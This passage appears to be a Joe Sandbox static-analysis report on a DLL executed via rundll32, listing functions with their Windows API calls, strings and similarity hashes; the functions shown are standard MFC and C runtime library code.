Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C
EncodePointer, xrefs: 1003464A
DecodePointer, xrefs: 1003465E

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC

Strings

DeactivateActCtx, xrefs: 10020CA1
CreateActCtxA, xrefs: 10020C7F
ReleaseActCtx, xrefs: 10020C87
ActivateActCtx, xrefs: 10020C94
KERNEL32, xrefs: 10020C63

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17

Uniqueness

Uniqueness Score: -1.00%

Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043A6C
std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
int.LIBCPMT ref: 10043A8D

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043A96
ctype.LIBCPMT ref: 10043AB0
std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
__CxxThrowException@8.LIBCMT ref: 10043AD2
std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8

Strings

bad cast, xrefs: 10043ABC

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 2535038987-3145022300
Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799

Uniqueness

Uniqueness Score: -1.00%

Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043C8B
std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
int.LIBCPMT ref: 10043CAC

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043CB5
codecvt.LIBCPMT ref: 10043CCF
std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
__CxxThrowException@8.LIBCMT ref: 10043CF1
std::locale::facet::_Incref.LIBCPMT ref: 10043D01
std::locale::facet::facet_Register.LIBCPMT ref: 10043D07

Strings

bad cast, xrefs: 10043CDB

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 577375395-3145022300
Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,04057276), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,04057276), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,04057276), ref: 100235D9

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10028CA6
GetPropA.USER32 ref: 10028CB5
CallWindowProcA.USER32 ref: 10028D0F

Part of subcall function 10027B1C: GetWindowRect.USER32 ref: 10027B46

SetWindowLongA.USER32(?,000000FC,?), ref: 10028D36
RemovePropA.USER32 ref: 10028D3E
GlobalFindAtomA.KERNEL32 ref: 10028D45
GlobalDeleteAtom.KERNEL32(?), ref: 10028D4F
CallWindowProcA.USER32 ref: 10028DA3

Strings

AfxOldWndProc423, xrefs: 10028CAE, 10028CB3, 10028D3C, 10028D44

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 1002B9C8
GetStockObject.GDI32(0000000D), ref: 1002B9D0
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
GetDC.USER32(00000000), ref: 1002B9EC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
ReleaseDC.USER32 ref: 1002BA18

Strings

System, xrefs: 1002B9C3, 1002BA2D

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 1001E7D5
SendMessageA.USER32(?,000000B1,?,?), ref: 1001E7FB
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 1001E815
SendMessageA.USER32(?,000000C2,00000000,?), ref: 1001E839
SendMessageA.USER32(?,000000B1,00000000,?), ref: 1001E86E
SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 1001E888
SendMessageA.USER32(?,000000C2,00000000,1004B96C), ref: 1001E8A4
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1001E8BD
SendMessageA.USER32(?,000000B6,00000000,?), ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002AF6B, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AF72
EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10001982

Strings

ios_base::eofbit set, xrefs: 10001A88
ios_base::failbit set, xrefs: 10001A1E
ios_base::badbit set, xrefs: 100019A3

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10021F51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B

EnableWindow.USER32(?,00000001), ref: 10021F9E
GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
GetCurrentProcessId.KERNEL32 ref: 10021FBC
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 10021FD4
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
EnableWindow.USER32(00000000,00000001), ref: 10022093

Strings

0, xrefs: 10022029

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 1002A99D
GetSystemMetrics.USER32 ref: 1002A9A4
GetSystemMetrics.USER32 ref: 1002A9AB
GetSystemMetrics.USER32 ref: 1002A9B5
GetDC.USER32(00000000), ref: 1002A9BF
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
ReleaseDC.USER32 ref: 1002A9E0

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0

Uniqueness

